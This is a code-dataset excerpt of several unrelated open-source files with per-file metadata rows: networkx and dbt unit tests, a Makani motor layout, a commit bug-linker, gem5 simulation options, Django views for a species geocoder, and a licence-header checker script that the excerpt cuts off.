G.add_weighted_edges_from([('0', '3', 3), ('0', '1', -5), ('1', '0', -5),
('0', '2', 2), ('1', '2', 4),
('2', '3', 1)])
pytest.raises(nx.NetworkXUnbounded, nx.johnson, G)
G = nx.Graph()
G.add_weighted_edges_from([('0', '3', 3), ('0', '1', -5), ('1', '0', -5),
('0', '2', 2), ('1', '2', 4),
('2', '3', 1)])
pytest.raises(nx.NetworkXUnbounded, nx.johnson, G)
def test_negative_weights(self):
G = nx.DiGraph()
G.add_weighted_edges_from([('0', '3', 3), ('0', '1', -5),
('0', '2', 2), ('1', '2', 4),
('2', '3', 1)])
paths = nx.johnson(G)
assert paths == {'1': {'1': ['1'], '3': ['1', '2', '3'],
'2': ['1', '2']}, '0': {'1': ['0', '1'],
'0': ['0'], '3': ['0', '1', '2', '3'],
'2': ['0', '1', '2']}, '3': {'3': ['3']},
'2': {'3': ['2', '3'], '2': ['2']}}
def test_unweighted_graph(self):
with pytest.raises(nx.NetworkXError):
G = nx.path_graph(5)
nx.johnson(G)
def test_graphs(self):
validate_path(self.XG, 's', 'v', 9, nx.johnson(self.XG)['s']['v'])
validate_path(self.MXG, 's', 'v', 9, nx.johnson(self.MXG)['s']['v'])
validate_path(self.XG2, 1, 3, 4, nx.johnson(self.XG2)[1][3])
validate_path(self.XG3, 0, 3, 15, nx.johnson(self.XG3)[0][3])
validate_path(self.XG4, 0, 2, 4, nx.johnson(self.XG4)[0][2])
validate_path(self.MXG4, 0, 2, 4, nx.johnson(self.MXG4)[0][2])
| mit | -4,608,623,554,818,168,000 | 44.279869 | 100 | 0.493855 | false |
google/makani | gs/monitor2/apps/plugins/layouts/motor_layout.py | 1 | 2241 | # Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Layout to monitor motors."""
from makani.gs.monitor2.apps.layout import base
from makani.gs.monitor2.apps.plugins import common
from makani.gs.monitor2.apps.plugins.indicators import motor
class MotorLayout(base.BaseLayout):
"""Layout to monitor motors."""
_NAME = 'Motors'
_DESIRED_VIEW_COLS = 2
_MODE = common.FULL_COMMS_MODE
def Initialize(self):
# Define how motors should be grouped, each group renders a chart.
self._motor_groups = {
'PTO/SBO': ['Pto', 'Sbo'],
'PBO/STO': ['Pbo', 'Sto'],
'PTI/SBI': ['Pti', 'Sbi'],
'PBI/STI': ['Pbi', 'Sti'],
}
self._AddIndicators('Status', [
motor.AioUpdateIndicator(self._MODE),
motor.ArmedIndicator(self._MODE),
motor.ErrorIndicator(self._MODE),
motor.WarningIndicator(self._MODE),
motor.MotorBusVoltageIndicator(self._MODE),
])
self._AddIndicators('Temperatures', [
motor.BoardTemperatureIndicator(self._MODE),
motor.HeatPlateTemperatureIndicator(self._MODE),
motor.StatorCoreTemperatureIndicator(self._MODE),
motor.WindingTemperatureIndicator(self._MODE),
])
self._AddIndicators('Warning and error printout', [
motor.MotorFlagNameIndicator(self._MODE, 'Warnings'),
motor.MotorFlagNameIndicator(self._MODE, 'Errors'),
])
self._UpdateProperties('Warning and error printout', {'cols': 2})
self._AddIndicators('Speed', [
motor.SpeedStackingChart(self._MODE, group_name, motor_short_names)
for group_name, motor_short_names in self._motor_groups.iteritems()])
self._UpdateProperties('Speed', {'cols': 2})
| apache-2.0 | -8,440,971,093,229,201,000 | 34.015625 | 77 | 0.685408 | false |
fishtown-analytics/dbt | test/unit/test_linker.py | 1 | 6077 | import os
import tempfile
import unittest
from unittest import mock
from dbt import linker
try:
from queue import Empty
except ImportError:
from Queue import Empty
def _mock_manifest(nodes):
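    # Fake manifest: both the nodes dict and expect() return mocks exposing unique_id.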
manifest = mock.MagicMock(nodes={
n: mock.MagicMock(unique_id=n) for n in nodes
})
manifest.expect.side_effect = lambda n: mock.MagicMock(unique_id=n)
return manifest
class LinkerTest(unittest.TestCase):
def setUp(self):
self.patcher = mock.patch.object(linker, 'is_blocking_dependency')
self.is_blocking_dependency = self.patcher.start()
self.is_blocking_dependency.return_value = True
self.linker = linker.Linker()
def tearDown(self):
self.patcher.stop()
def test_linker_add_node(self):
expected_nodes = ['A', 'B', 'C']
for node in expected_nodes:
self.linker.add_node(node)
actual_nodes = self.linker.nodes()
for node in expected_nodes:
self.assertIn(node, actual_nodes)
self.assertEqual(len(actual_nodes), len(expected_nodes))
def test_linker_write_and_read_graph(self):
expected_nodes = ['A', 'B', 'C']
for node in expected_nodes:
self.linker.add_node(node)
manifest = _mock_manifest('ABC')
(fd, fname) = tempfile.mkstemp()
os.close(fd)
try:
self.linker.write_graph(fname, manifest)
new_linker = linker.from_file(fname)
finally:
os.unlink(fname)
actual_nodes = new_linker.nodes()
for node in expected_nodes:
self.assertIn(node, actual_nodes)
self.assertEqual(len(actual_nodes), len(expected_nodes))
def assert_would_join(self, queue):
"""test join() without timeout risk"""
self.assertEqual(queue.inner.unfinished_tasks, 0)
def test_linker_add_dependency(self):
actual_deps = [('A', 'B'), ('A', 'C'), ('B', 'C')]
for (l, r) in actual_deps:
self.linker.dependency(l, r)
manifest = _mock_manifest('ABC')
queue = self.linker.as_graph_queue(manifest)
got = queue.get(block=False)
self.assertEqual(got.unique_id, 'C')
with self.assertRaises(Empty):
queue.get(block=False)
self.assertFalse(queue.empty())
queue.mark_done('C')
self.assertFalse(queue.empty())
got = queue.get(block=False)
self.assertEqual(got.unique_id, 'B')
with self.assertRaises(Empty):
queue.get(block=False)
self.assertFalse(queue.empty())
queue.mark_done('B')
self.assertFalse(queue.empty())
got = queue.get(block=False)
self.assertEqual(got.unique_id, 'A')
with self.assertRaises(Empty):
queue.get(block=False)
self.assertTrue(queue.empty())
queue.mark_done('A')
self.assert_would_join(queue)
self.assertTrue(queue.empty())
def test_linker_add_disjoint_dependencies(self):
actual_deps = [('A', 'B')]
additional_node = 'Z'
for (l, r) in actual_deps:
self.linker.dependency(l, r)
self.linker.add_node(additional_node)
manifest = _mock_manifest('ABZ')
queue = self.linker.as_graph_queue(manifest)
# the first one we get must be B, it has the longest dep chain
first = queue.get(block=False)
self.assertEqual(first.unique_id, 'B')
self.assertFalse(queue.empty())
queue.mark_done('B')
self.assertFalse(queue.empty())
second = queue.get(block=False)
self.assertIn(second.unique_id, {'A', 'Z'})
self.assertFalse(queue.empty())
queue.mark_done(second.unique_id)
self.assertFalse(queue.empty())
third = queue.get(block=False)
self.assertIn(third.unique_id, {'A', 'Z'})
with self.assertRaises(Empty):
queue.get(block=False)
self.assertNotEqual(second.unique_id, third.unique_id)
self.assertTrue(queue.empty())
queue.mark_done(third.unique_id)
self.assert_would_join(queue)
self.assertTrue(queue.empty())
def test_linker_dependencies_limited_to_some_nodes(self):
actual_deps = [('A', 'B'), ('B', 'C'), ('C', 'D')]
for (l, r) in actual_deps:
self.linker.dependency(l, r)
queue = self.linker.as_graph_queue(_mock_manifest('ABCD'), ['B'])
got = queue.get(block=False)
self.assertEqual(got.unique_id, 'B')
self.assertTrue(queue.empty())
queue.mark_done('B')
self.assert_would_join(queue)
queue_2 = self.linker.as_graph_queue(_mock_manifest('ABCD'), ['A', 'B'])
got = queue_2.get(block=False)
self.assertEqual(got.unique_id, 'B')
self.assertFalse(queue_2.empty())
with self.assertRaises(Empty):
queue_2.get(block=False)
queue_2.mark_done('B')
self.assertFalse(queue_2.empty())
got = queue_2.get(block=False)
self.assertEqual(got.unique_id, 'A')
self.assertTrue(queue_2.empty())
with self.assertRaises(Empty):
queue_2.get(block=False)
self.assertTrue(queue_2.empty())
queue_2.mark_done('A')
self.assert_would_join(queue_2)
def test_linker_bad_limit_throws_runtime_error(self):
actual_deps = [('A', 'B'), ('B', 'C'), ('C', 'D')]
for (l, r) in actual_deps:
self.linker.dependency(l, r)
with self.assertRaises(RuntimeError):
self.linker.as_graph_queue(_mock_manifest('ABCD'), ['ZZZ'])
def test__find_cycles__cycles(self):
actual_deps = [('A', 'B'), ('B', 'C'), ('C', 'A')]
for (l, r) in actual_deps:
self.linker.dependency(l, r)
self.assertIsNotNone(self.linker.find_cycles())
def test__find_cycles__no_cycles(self):
actual_deps = [('A', 'B'), ('B', 'C'), ('C', 'D')]
for (l, r) in actual_deps:
self.linker.dependency(l, r)
self.assertIsNone(self.linker.find_cycles())
| apache-2.0 | -9,025,431,726,065,684,000 | 30.984211 | 80 | 0.586803 | false |
bumper-app/bumper-bianca | bianca/analyzer/bugfinder.py | 1 | 3624 | """
file: bugfinder.py
author: Christoffer Rosen <[email protected]>
date: November 2013
description: Links changes that introduces bugs by identifying changes
that fix problems.
"""
import re
from orm.commit import *
from caslogging import logging
from analyzer.git_commit_linker import *
import json
class BugFinder:
"""
BugFinder():
	description: Links changes that introduce bugs.
"""
def __init__(self, allCommits, correctiveCommits, issueTracker):
"""
Constructor
@param commits: All commits in ascending order by date
@param correctiveCommits: All commits/changes which are identified
as fixing problems.
@param issueTracker: Issue tracker (e.g., GitHub Issues)
"""
self.allCommits = allCommits
self.correctiveCommits = correctiveCommits
self.issueTracker = issueTracker
def findIssueOpened(self, correctiveCommit):
"""
		findIssueOpened()
		If the corrective change/commit links to an issue in the issue tracker, returns
		the date of the oldest open issue found; otherwise returns None.
"""
issue_opened = None
if(self.issueTracker is None or hasattr(self.issueTracker, "getDateOpened") == False):
return None
idMatch = re.compile('#[\d]+')
issue_ids = idMatch.findall(correctiveCommit.commit_message)
issue_ids = [issue_id.strip('#') for issue_id in issue_ids] # Remove the '#' from ids
if len(issue_ids) > 0:
issue_opened = self.issueTracker.getDateOpened(issue_ids[0])
# Use the oldest open bug
for issue_id in issue_ids:
logging.info('Searching for issue id: ' + issue_id)
curr_issue_opened = self.issueTracker.getDateOpened(issue_id)
# Verify that an issue was found.
if curr_issue_opened is not None:
if int(curr_issue_opened) < int(issue_opened):
issue_opened = curr_issue_opened
return issue_opened
def searchForBuggyCommit(self, correctiveCommit):
"""
Finds the buggy commit based on the bug fixing commit
		Helper method for markBuggyCommits. If the commit links to an issue in the
		issue tracker, we check files changed prior to the date it was opened.
		Otherwise, we only check dates prior to the fix.
		@param correctiveCommit: the bug fixing commit
"""
bug_introduced_prior = correctiveCommit.author_date_unix_timestamp
issue_opened = self.findIssueOpened(correctiveCommit)
if issue_opened is not None:
bug_introduced_prior = issue_opened
if 'CAS_DELIMITER' in correctiveCommit.fileschanged:
# Provide legacy support for the previous fileschanged format
correctiveFiles = correctiveCommit.fileschanged.split(",CAS_DELIMITER,")
else:
correctiveFiles = json.loads(correctiveCommit.fileschanged)
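		# Blame the earliest prior commit that touched any file changed by the fix.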
for commit in self.allCommits:
if int(commit.author_date_unix_timestamp) < int(bug_introduced_prior):
if 'CAS_DELIMITER' in commit.fileschanged:
# Provide legacy support for the previous fileschanged format
commitFiles = commit.fileschanged.split(",CAS_DELIMITER,")
else:
commitFiles = json.loads(commit.fileschanged)
for commitFile in commitFiles:
					# This commit introduced the bug!
if commitFile in correctiveFiles:
return commit
return -1 # Not found
def markBuggyCommits(self):
"""
Finds bug inducing commits based on those that are
bug fixing. It checks commits prior to this and determines
it to be bug inducing if it changes the same file in a bug fixing
commit
"""
for correctiveCommit in self.correctiveCommits:
buggyCommit = self.searchForBuggyCommit(correctiveCommit)
			if buggyCommit != -1:
buggyCommit.contains_bug = True
#else:
#print("Cound not find the bug inducing commit for: " +
# correctiveCommit.commit_message)
| mit | 9,136,406,733,710,434,000 | 30.241379 | 88 | 0.737307 | false |
danielpalomino/gem5 | configs/common/Options.py | 1 | 10060 | # Copyright (c) 2006-2008 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Lisa Hsu
import m5
from m5.defines import buildEnv
from m5.objects import *
from Benchmarks import *
def addCommonOptions(parser):
# system options
parser.add_option("--cpu-type", type="choice", default="atomic",
choices = ["atomic", "timing", "detailed", "inorder",
"arm_detailed"],
help = "type of cpu to run with")
parser.add_option("--checker", action="store_true");
parser.add_option("-n", "--num-cpus", type="int", default=1)
parser.add_option("--caches", action="store_true")
parser.add_option("--l2cache", action="store_true")
parser.add_option("--fastmem", action="store_true")
parser.add_option("--clock", action="store", type="string", default='2GHz')
parser.add_option("--num-dirs", type="int", default=1)
parser.add_option("--num-l2caches", type="int", default=1)
parser.add_option("--num-l3caches", type="int", default=1)
parser.add_option("--l1d_size", type="string", default="64kB")
parser.add_option("--l1i_size", type="string", default="32kB")
parser.add_option("--l2_size", type="string", default="2MB")
parser.add_option("--l3_size", type="string", default="16MB")
parser.add_option("--l1d_assoc", type="int", default=2)
parser.add_option("--l1i_assoc", type="int", default=2)
parser.add_option("--l2_assoc", type="int", default=8)
parser.add_option("--l3_assoc", type="int", default=16)
parser.add_option("--cacheline_size", type="int", default=64)
parser.add_option("--ruby", action="store_true")
# Run duration options
parser.add_option("-m", "--maxtick", type="int", default=m5.MaxTick,
metavar="T", help="Stop after T ticks")
parser.add_option("--maxtime", type="float")
parser.add_option("-I", "--maxinsts", action="store", type="int",
default=None, help="""Total number of instructions to
simulate (default: run forever)""")
parser.add_option("--work-item-id", action="store", type="int",
help="the specific work id for exit & checkpointing")
parser.add_option("--work-begin-cpu-id-exit", action="store", type="int",
help="exit when work starts on the specified cpu")
parser.add_option("--work-end-exit-count", action="store", type="int",
help="exit at specified work end count")
parser.add_option("--work-begin-exit-count", action="store", type="int",
help="exit at specified work begin count")
parser.add_option("--init-param", action="store", type="int", default=0,
help="""Parameter available in simulation with m5
initparam""")
# Checkpointing options
###Note that performing checkpointing via python script files will override
###checkpoint instructions built into binaries.
parser.add_option("--take-checkpoints", action="store", type="string",
help="<M,N> will take checkpoint at cycle M and every N cycles thereafter")
parser.add_option("--max-checkpoints", action="store", type="int",
help="the maximum number of checkpoints to drop", default=5)
parser.add_option("--checkpoint-dir", action="store", type="string",
help="Place all checkpoints in this absolute directory")
parser.add_option("-r", "--checkpoint-restore", action="store", type="int",
help="restore from checkpoint <N>")
parser.add_option("--checkpoint-at-end", action="store_true",
help="take a checkpoint at end of run")
parser.add_option("--work-begin-checkpoint-count", action="store", type="int",
help="checkpoint at specified work begin count")
parser.add_option("--work-end-checkpoint-count", action="store", type="int",
help="checkpoint at specified work end count")
parser.add_option("--work-cpus-checkpoint-count", action="store", type="int",
help="checkpoint and exit when active cpu count is reached")
parser.add_option("--restore-with-cpu", action="store", type="choice",
default="atomic", choices = ["atomic", "timing",
"detailed", "inorder"],
help = "cpu type for restoring from a checkpoint")
# CPU Switching - default switch model goes from a checkpoint
# to a timing simple CPU with caches to warm up, then to detailed CPU for
# data measurement
parser.add_option("--repeat-switch", action="store", type="int",
default=None,
help="switch back and forth between CPUs with period <N>")
parser.add_option("-s", "--standard-switch", action="store", type="int",
default=None,
help="switch from timing to Detailed CPU after warmup period of <N>")
parser.add_option("-p", "--prog-interval", type="int",
help="CPU Progress Interval")
# Fastforwarding and simpoint related materials
parser.add_option("-W", "--warmup-insts", action="store", type="int",
default=None,
help="Warmup period in total instructions (requires --standard-switch)")
parser.add_option("--bench", action="store", type="string", default=None,
help="base names for --take-checkpoint and --checkpoint-restore")
parser.add_option("-F", "--fast-forward", action="store", type="string",
default=None,
help="Number of instructions to fast forward before switching")
parser.add_option("-S", "--simpoint", action="store_true", default=False,
help="""Use workload simpoints as an instruction offset for
--checkpoint-restore or --take-checkpoint.""")
parser.add_option("--at-instruction", action="store_true", default=False,
help="""Treat value of --checkpoint-restore or --take-checkpoint as a
number of instructions.""")
def addSEOptions(parser):
# Benchmark options
parser.add_option("-c", "--cmd", default="",
help="The binary to run in syscall emulation mode.")
parser.add_option("-o", "--options", default="",
help="""The options to pass to the binary, use " "
around the entire string""")
parser.add_option("-i", "--input", default="",
help="Read stdin from a file.")
parser.add_option("--output", default="",
help="Redirect stdout to a file.")
parser.add_option("--errout", default="",
help="Redirect stderr to a file.")
def addFSOptions(parser):
# Simulation options
parser.add_option("--timesync", action="store_true",
help="Prevent simulated time from getting ahead of real time")
# System options
parser.add_option("--kernel", action="store", type="string")
parser.add_option("--script", action="store", type="string")
parser.add_option("--frame-capture", action="store_true",
help="Stores changed frame buffers from the VNC server to compressed "\
"files in the gem5 output directory")
if buildEnv['TARGET_ISA'] == "arm":
parser.add_option("--bare-metal", action="store_true",
help="Provide the raw system without the linux specific bits")
parser.add_option("--machine-type", action="store", type="choice",
choices=ArmMachineType.map.keys(), default="RealView_PBX")
# Benchmark options
parser.add_option("--dual", action="store_true",
help="Simulate two systems attached with an ethernet link")
parser.add_option("-b", "--benchmark", action="store", type="string",
dest="benchmark",
help="Specify the benchmark to run. Available benchmarks: %s"\
% DefinedBenchmarks)
# Metafile options
parser.add_option("--etherdump", action="store", type="string", dest="etherdump",
help="Specify the filename to dump a pcap capture of the" \
"ethernet traffic")
# Disk Image Options
parser.add_option("--disk-image", action="store", type="string", default=None,
help="Path to the disk image to use.")
# Memory Size Options
parser.add_option("--mem-size", action="store", type="string", default=None,
help="Specify the physical memory size (single memory)")
| bsd-3-clause | -2,901,236,696,301,935,600 | 54.274725 | 85 | 0.633996 | false |
BILS/agda | agda/species_geo_coder/views.py | 1 | 2551 | import time
#from django.shortcuts import render
from django.views.generic import TemplateView, FormView
from django.shortcuts import redirect, render
from django.db import transaction
from agda.views import package_template_dict
from jobs.models import (JOB_STATUS_LEVEL_ACCEPTED,
JOB_STATUS_LEVEL_FINISHED,
get_job_or_404)
from species_geo_coder.models import app_package, SpeciesGeoCoderJob
from species_geo_coder.forms import SpeciesGeoCoderForm
from species_geo_coder.models import tool_1
# Create your views here.
class IndexView(TemplateView):
template_name = 'species_geo_coder/index.html'
def get_context_data(self, *args, **kw):
context = super(IndexView, self).get_context_data(**kw)
return package_template_dict(self.request, app_package, *args, **kw)
class ToolView(FormView):
template_name = 'species_geo_coder/speciesgeocoder.html'
form_class = SpeciesGeoCoderForm
@transaction.atomic
def form_valid(self, form):
request = self.request
## These are all generic, should be extracted to a main class
job = SpeciesGeoCoderJob(status=JOB_STATUS_LEVEL_ACCEPTED)
job.save()
job = SpeciesGeoCoderJob.objects.select_for_update().get(pk=job.id)
job.log_create(request.user, 'Created in web interface.')
verbose = form.cleaned_data['verbose']
occurences = form.cleaned_data['occurences']
plot = form.cleaned_data['plot']
job.submit(request.user, request.META['REMOTE_ADDR'], form.cleaned_data['name'],
self.request.FILES, occurences, verbose, plot)
return redirect('jobs.views.show_results', job.slug)
@transaction.atomic
def tool_1_results(request, slug):
job = get_job_or_404(slug=slug, select_for_update=True)
job.update_status(request.user)
params = dict(job=job, tool=tool_1)
if job.is_alive:
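        # Exponentially back off page reloads, remembering the next allowed
        # reload time per job in the session.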
reload_time, interval = request.session.setdefault('mdrscan', dict()).pop(job.slug, (0, 5))
if reload_time <= time.time():
reload_time = max(time.time() + 5, reload_time + interval)
interval *= 2
request.session['mdrscan'][job.slug] = (reload_time, interval)
request.session.modified = True
params.update(timeout=reload_time - time.time())
params.update(reload_time=reload_time, interval=interval)
return render(request, 'species_geo_coder/results.html', params)
#class ToolResultView(TemplateView):
# template_name = '<app>/tool_result.html'
| mit | 1,003,078,452,284,598,300 | 38.246154 | 99 | 0.681693 | false |
lowRISC/manticore | util/license-checker.py | 2 | 17721 | #!/usr/bin/env python3
#
# Copyright lowRISC contributors.
# Licensed under the Apache License, Version 2.0, see LICENSE for details.
# SPDX-License-Identifier: Apache-2.0
import argparse
import fnmatch
import logging
import re
import subprocess
from pathlib import Path
from types import SimpleNamespace
import hjson
from tabulate import tabulate
class LicenceHeader(object):
"""Represents the licence header we want to insert"""
def __init__(self, text):
self._lines = text.strip().splitlines()
def __getitem__(self, idx):
return self._lines.__getitem__(idx)
def __len__(self):
return self._lines.__len__()
def numbered_lines(self, skip=0):
"""Returns an iterator of (line_no, line_text).
`line_no` counts from 1, and is for humans to count line numbers with.
        use `skip` to skip enumerating the first few lines.
"""
return enumerate(self._lines[skip:], start=1 + skip)
@property
def first_word(self):
(first_word, _) = self._lines[0].split(' ', 1)
return first_word
class CommentStyle:
'''Base class for comment style objects'''
def __init__(self, first_line_prefix, comment_prefix):
self.first_line_prefix = first_line_prefix
self.comment_prefix = comment_prefix
def search_line_pattern(self, licence_first_word):
return re.compile(
re.escape(self.comment_prefix + ' ' + licence_first_word))
def full_line_parts(self, licence_line):
return [re.escape(self.comment_prefix), licence_line]
def full_line_pattern(self, licence_line):
'''Returns a regex pattern which matches one line of licence text.'''
return re.compile(' '.join(self.full_line_parts(licence_line)))
class LineCommentStyle(CommentStyle):
"""Helpers for line-style comments."""
def __init__(self, prefix):
super().__init__(prefix, prefix)
class DifferentFirstLineCommentStyle(CommentStyle):
"""Some files have a different allowable prefix for their first line."""
def __init__(self, first_line_prefix, prefix):
super().__init__(first_line_prefix, prefix)
class BlockCommentStyle(CommentStyle):
"""Helpers for block-style comments."""
def __init__(self, prefix, suffix):
super().__init__(prefix, prefix)
self.comment_suffix = str(suffix)
def full_line_parts(self, licence_line):
return [
re.escape(self.comment_prefix), licence_line,
re.escape(self.comment_suffix)
]
SLASH_SLASH = '//'
HASH = '#'
SLASH_STAR = '/*'
COMMENT_STYLES = {
SLASH_SLASH: LineCommentStyle("//"),
HASH: LineCommentStyle("#"),
SLASH_STAR: BlockCommentStyle("/*", "*/"),
'corefile': DifferentFirstLineCommentStyle("CAPI=2", "#")
}
# (Prioritised) Mapping of file name suffixes to comment style. If the suffix
# of your file does not match one of these, it will not be checked.
#
# Each entry is a pair (suffixes, styles). suffixes is a list of file suffixes:
# if a filename matches one of these suffixes, we'll use the styles in styles.
# styles is either a string or a list of strings. If there is one or more
# strings, these strings must all be keys of COMMENT_STYLES and they give the
# different comment styles that are acceptable for the file type.
#
# These rules are given in priority order. Tuples higher in the list are
# matched before those later in the list, on purpose.
#
# Files that either do not match any extension or that have an empty list of
# styles are not checked for a licence.
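# For example (illustrative filenames): "rtl/top.sv" ends with ".sv" and is therefore
# checked with the "//" line-comment style, while "README.md" matches the Markdown rule,
# whose empty style list means the file is skipped entirely.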
COMMENT_CHARS = [
# Hardware Files
([".svh", ".sv", ".sv.tpl"], SLASH_SLASH), # SystemVerilog
# Hardware Build Systems
([".tcl", ".sdc"], HASH), # tcl
([".core", ".core.tpl"], 'corefile'), # FuseSoC Core Files
(["Makefile", ".mk"], HASH), # Makefiles
([".ys"], HASH), # Yosys script
([".waiver"], HASH), # AscentLint waiver files
([".vlt"], SLASH_SLASH), # Verilator configuration (waiver) files
([".vbl"], HASH), # Verible configuration files
([".el", ".el.tpl"], SLASH_SLASH), # Exclusion list
([".cfg", ".cfg.tpl"], [SLASH_SLASH,
HASH]), # Kinds of configuration files
([".f"], []), # File lists (not checked)
# The following two rules will inevitably bite us.
(["riviera_run.do"], HASH), # Riviera dofile
([".do"], SLASH_SLASH), # Cadence LEC dofile
# Software Files
([".c", ".c.tpl", ".h", ".h.tpl", ".cc", ".cpp"], SLASH_SLASH), # C, C++
([".def"], SLASH_SLASH), # C, C++ X-Include List Declaration Files
([".S"], [SLASH_SLASH, SLASH_STAR]), # Assembly (With Preprocessing)
([".s"], SLASH_STAR), # Assembly (Without Preprocessing)
([".ld", ".ld.tpl"], SLASH_STAR), # Linker Scripts
([".rs", ".rs.tpl"], SLASH_SLASH), # Rust
# Software Build Systems
(["meson.build", "toolchain.txt", "meson_options.txt"], HASH), # Meson
# General Tooling
([".py"], HASH), # Python
([".sh"], HASH), # Shell Scripts
(["Dockerfile"], HASH), # Dockerfiles
# Configuration
([".hjson", ".hjson.tpl"], SLASH_SLASH), # hjson
([".yml", ".yaml"], HASH), # YAML
([".toml"], HASH), # TOML
(["-requirements.txt"], HASH), # Apt and Python requirements files
(["redirector.conf"], HASH), # nginx config
# Documentation
([".md", ".md.tpl", ".html"], []), # Markdown and HTML (not checked)
([".css"], SLASH_STAR), # CSS
([".scss"], SLASH_SLASH), # SCSS
# Templates (Last because there are overlaps with extensions above)
([".tpl"], HASH), # Mako templates
]
class LicenceMatcher:
'''An object to match a given licence at the start of a file'''
def __init__(self, comment_style, licence, match_regex):
self.style = comment_style
self.expected_lines = list()
# In case we are using regex matching we can pass the full line "as is"
if match_regex:
for i, ll in enumerate(licence):
try:
self.expected_lines.append(
comment_style.full_line_pattern(ll))
# Catch any regex error here and raise a runtime error.
except re.error as e:
raise RuntimeError(
"Can't compile line {} of the licence as a regular expression. Saw `{}`: {}"
.format(i, e.pattern[e.pos], e.msg))
# use the "first line" as a licence marker
self.search_marker = self.expected_lines[0]
# For non-regex matching we need to escape everything.
# This can never throw an exception as everything has been escaped and
# therefore is always a legal regex.
else:
self.search_marker = comment_style.search_line_pattern(
licence.first_word)
self.expected_lines = [
comment_style.full_line_pattern(re.escape(ll))
for ll in licence
]
self.lines_left = []
def looks_like_first_line_comment(self, line):
return line.startswith(self.style.first_line_prefix)
def looks_like_comment(self, line):
return line.startswith(self.style.comment_prefix)
def looks_like_first_line(self, line):
return self.search_marker.match(line) is not None
def start(self):
'''Reset lines_left, to match at the start of the licence'''
self.lines_left = self.expected_lines
def take_line(self, line):
'''Check whether line matches the next line of the licence.
Returns a pair (matched, done). matched is true if the line matched. If
this was the last line of the licence, done is true. On a match, this
increments an internal counter, so the next call to take_line will
match against the next line of the licence.
'''
# If we have no more lines to match, claim a match and that we're done.
# This shouldn't happen in practice, except if the configuration has an
# empty licence.
if not self.lines_left:
return (True, True)
next_expected = self.lines_left[0]
matched = next_expected.fullmatch(line)
if not matched:
return (False, False)
        self.lines_left = self.lines_left[1:]
return (True, not self.lines_left)
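    # Typical driver of this protocol (sketch): call start(), then feed lines until done
    # is True or a line fails to match:
    #     matcher.start()
    #     matched, done = matcher.take_line(line)   # repeated for each candidate line
    # check_file_with_matcher() below is the real consumer of this protocol.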
def detect_comment_char(all_matchers, filename):
'''Find zero or more LicenceMatcher objects for filename
all_matchers should be a dict like COMMENT_STYLES, but where the values are
the corresponding LicenceMatcher objects.
'''
found = None
for (suffixes, keys) in COMMENT_CHARS:
if found is not None:
break
for suffix in suffixes:
if filename.endswith(suffix):
found = keys
break
if found is None:
return []
if not isinstance(found, list):
assert isinstance(found, str)
found = [found]
return [all_matchers[key] for key in found]
def git_find_repo_toplevel():
git_output = subprocess.check_output(
['git', 'rev-parse', '--show-toplevel'])
return Path(git_output.decode().strip()).resolve()
def git_find_all_file_paths(top_level, search_paths):
git_output = subprocess.check_output(
["git", "-C",
str(top_level), "ls-files", "-z", "--", *search_paths])
for path in git_output.rstrip(b"\0").split(b"\0"):
yield Path(top_level, path.decode())
class ResultsTracker(object):
"""Helper for tracking results"""
def __init__(self, base_dir):
self.base_dir = base_dir
passed_count = 0
failed_count = 0
excluded_count = 0
skipped_count = 0
failing_paths = set()
@property
def total_count(self):
return (self.passed_count + self.failed_count + self.skipped_count +
self.excluded_count)
def passed(self, path, line_no, reason):
rel_path = path.relative_to(self.base_dir)
logging.debug("%s:%d PASSED: %s", str(rel_path), line_no, reason)
self.passed_count += 1
def failed(self, path, line_no, reason):
rel_path = path.relative_to(self.base_dir)
logging.error("%s:%d FAILED: %s", str(rel_path), line_no, reason)
self.failing_paths.add(rel_path)
self.failed_count += 1
def skipped(self, path, reason):
rel_path = path.relative_to(self.base_dir)
logging.info("%s: SKIPPED: %s", str(rel_path), reason)
self.skipped_count += 1
def excluded(self, path, reason):
rel_path = path.relative_to(self.base_dir)
logging.debug("%s: EXCLUDED: %s", str(rel_path), reason)
self.excluded_count += 1
def any_failed(self):
return self.failed_count > 0
def display_nicely(self):
headers = ["Results:", "Files"]
results = [["Passed", self.passed_count],
["Failed", self.failed_count],
["Skipped", self.skipped_count],
["Excluded", self.excluded_count],
["Total", self.total_count]]
return tabulate(results, headers, tablefmt="simple")
def matches_exclude_pattern(config, file_path):
rel_path = str(file_path.relative_to(config.base_dir))
for exclude_pattern in config.exclude_paths:
if fnmatch.fnmatch(rel_path, exclude_pattern):
return True
return False
def check_paths(config, git_paths):
results = ResultsTracker(config.base_dir)
try:
all_matchers = {
key: LicenceMatcher(style, config.licence, config.match_regex)
for key, style in COMMENT_STYLES.items()
}
except RuntimeError as e:
exit(e)
for filepath in git_find_all_file_paths(config.base_dir, git_paths):
